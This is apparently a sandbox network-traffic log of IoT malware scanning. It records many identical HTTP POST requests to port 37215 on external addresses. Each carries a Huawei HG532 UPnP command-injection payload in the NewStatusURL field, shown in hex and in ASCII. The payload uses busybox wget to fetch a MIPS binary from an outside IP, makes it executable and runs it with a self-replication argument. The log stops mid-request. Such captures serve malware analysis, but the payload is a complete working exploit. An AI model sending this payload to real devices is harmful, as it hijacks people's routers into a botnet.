                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.1442050157.62.62.11337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829338074 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.1436214197.40.168.19637215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.829339027 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.1435948157.153.42.437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.1450092157.244.153.7437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.1449870181.89.181.10337215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.1440008133.28.220.10037215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.1444230157.18.39.437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.1444722157.96.246.17437215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.1440202157.157.49.6537215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.1450094157.104.80.1637215
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.830271959 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 482
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 